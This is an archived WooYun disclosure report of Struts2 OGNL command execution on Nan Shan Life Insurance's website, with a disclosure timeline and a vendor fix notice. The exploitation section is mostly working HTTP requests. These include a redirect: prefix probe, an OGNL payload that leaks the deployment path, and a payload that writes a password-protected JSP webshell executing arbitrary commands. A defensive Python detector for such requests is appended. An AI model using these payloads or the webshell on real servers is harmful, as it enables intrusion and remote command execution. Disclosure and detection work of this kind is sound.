WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
WooYun Drops articles online -------- http://drop.zone.ci/
2015-12-15: Details sent to the vendor, awaiting vendor handling
2015-12-15: Vendor confirmed; details disclosed to the vendor only
2015-12-25: Details disclosed to core white hats and relevant domain experts
2016-01-04: Details disclosed to regular white hats
2016-01-14: Details disclosed to intern white hats
2016-01-27: Vendor has fixed the vulnerability and disclosed it proactively; details made public
Command execution on the official website of Taiwan's Nan Shan Life Insurance (南山人寿) allows getshell
Visit the URL https://**.**.**.**/eServicePublic/publicweb/office/OfficeArticle.action?chanelMap=13, as shown in the figure:
Run the following command and check whether a 302 redirect occurs.
$ curl -i https://**.**.**.**/eServicePublic/publicweb/office/OfficeArticle.action?chanelMap=13 -F "redirect:/xxoo=-1"
HTTP/1.1 100 Continue
HTTP/1.1 302 Found
Date: Mon, 14 Dec 2015 14:16:38 GMT
Server: IBM_HTTP_Server
X-Powered-By: Servlet/3.0
Location: https://**.**.**.**/eServicePublic/xxoo
Content-Length: 0
Content-Type: text/plain
Content-Language: en-US
A 302 redirect is observed, so the redirect: prefix is being honoured. Capture the request, change the method to POST, and retrieve the absolute deployment path of the web application as follows:
POST /eServicePublic/publicweb/office/OfficeArticle.action?chanelMap=13 HTTP/1.1
Host: **.**.**.**
Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=0000010JCkqr9Egyntbk-S5O7On:PLWS9_eServ; _ga=GA1.3.246686188.1450007096
Content-Type: multipart/form-data; boundary=------------------------5423a63046c50524a84963968721
Content-Length: 258

--------------------------5423a63046c50524a84963968721
Content-Disposition: form-data; name="redirect:/${#context.get("com.opensymphony.xwork2.dispatcher.HttpServletRequest").getRealPath("/")}"

-1
--------------------------5423a63046c50524a84963968721
The result is shown in the figure below:
Next, send the request that writes the webshell (a one-line JSP shell) 200081214.jsp:
POST /eServicePublic/publicweb/office/OfficeArticle.action?chanelMap=13 HTTP/1.1
Host: **.**.**.**
Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=0000010JCkqr9Egyntbk-S5O7On:PLWS9_eServ; _ga=GA1.3.246686188.1450007096
Content-Type: multipart/form-data; boundary=------------------------5423a63046c50524a84963968721
Content-Length: 659

--------------------------5423a63046c50524a84963968721
Content-Disposition: form-data; name="redirect:/${"x"+(new **.**.**.**.PrintWriter("/opt/WebSphere/AppServer/profiles/eService/installedApps/WASCell/eServicePublicEAR.ear/eServicePublic.war/200081214.jsp")).append("<%if(\"023\".equals(request.getParameter(\"pwd\"))){**.**.**.**.InputStream in = Runtime.getRuntime().exec(request.getParameter(\"i\")).getInputStream()\u003bint a = -1\u003bbyte[] b = new byte[2048]\u003bout.print(\"<pre>\")\u003bwhile((a=in.read(b))!=-1){out.println(new String(b))\u003b}out.print(\"</pre>\")\u003b}%>").close()}"

-1
--------------------------5423a63046c50524a84963968721
The result:
Visit the webshell that was just written: https://**.**.**.**/eServicePublic/200081214.jsp?pwd=023&i=ls%20-l%20/opt/WebSphere/AppServer/profiles/eService/installedApps/WASCell/eServicePublicEAR.ear/eServicePublic.war/ as shown in the figure below:
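For defenders reviewing WAF or access logs, the requests above have a recognisable signature: a multipart form field whose name starts with a Struts2 action-mapping prefix (redirect:, redirectAction:, action:) and, in the dangerous cases, carries OGNL syntax (${ or %{). The following Python detector is an added example and not part of the original report; the sample request it scans is constructed here, with the field names taken from the requests shown above (host and boundary are placeholders). It also handles the unescaped double quotes inside the injected field name, which naive quoted-string parsing would truncate.

```python
import re

# Struts2 DefaultActionMapper prefixes that a client should never be sending.
PREFIXES = ("redirect:", "redirectaction:", "action:")
OGNL = re.compile(r"[$%]\{")

# Constructed sample request; field names mirror the report above.
SAMPLE = (
    b"POST /eServicePublic/publicweb/office/OfficeArticle.action?chanelMap=13 HTTP/1.1\r\n"
    b"Host: example.invalid\r\n"
    b"Content-Type: multipart/form-data; boundary=----xyz\r\n\r\n"
    b"------xyz\r\n"
    b'Content-Disposition: form-data; name="chanelMap"\r\n\r\n13\r\n'
    b"------xyz\r\n"
    b'Content-Disposition: form-data; name="redirect:/xxoo"\r\n\r\n-1\r\n'
    b"------xyz\r\n"
    b'Content-Disposition: form-data; name="redirect:/${#context.get("com.opensymphony.xwork2.dispatcher.HttpServletRequest").getRealPath("/")}"\r\n\r\n-1\r\n'
    b"------xyz--\r\n"
)


def parse_multipart(raw: bytes) -> dict:
    """Return {field name: value} for a raw multipart/form-data request."""
    head, _, body = raw.partition(b"\r\n\r\n")
    m = re.search(rb"boundary=([^\r\n;]+)", head)
    if not m:
        return {}
    boundary = b"--" + m.group(1).strip()
    fields = {}
    for chunk in body.split(boundary):
        chunk = chunk.strip(b"\r\n")
        if not chunk or chunk == b"--":  # leading empty piece / closing marker
            continue
        phead, _, pbody = chunk.partition(b"\r\n\r\n")
        # Greedy to the last quote on the line: injected names contain raw '"'.
        nm = re.search(rb'name="(.*)"', phead)
        if nm:
            fields[nm.group(1).decode("utf-8", "replace")] = pbody.decode("utf-8", "replace")
    return fields


def classify(name: str) -> str:
    """'ok', 'prefix-probe' (redirect: abuse) or 'ognl-injection' (${...} present)."""
    if not name.lower().startswith(PREFIXES):
        return "ok"
    return "ognl-injection" if OGNL.search(name) else "prefix-probe"


def scan(raw: bytes) -> dict:
    """Map every field name in the request to its classification."""
    return {name: classify(name) for name in parse_multipart(raw)}
```

A hit on either non-"ok" class against a Struts2 endpoint is worth an alert on its own; the same prefix check applies to query-string parameter names.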
Remediation: upgrade Struts2 to the latest version.
Severity: High
Vulnerability Rank: 18
Confirmed: 2015-12-15 23:52
Thank you for the report.
2016-01-27: Fixed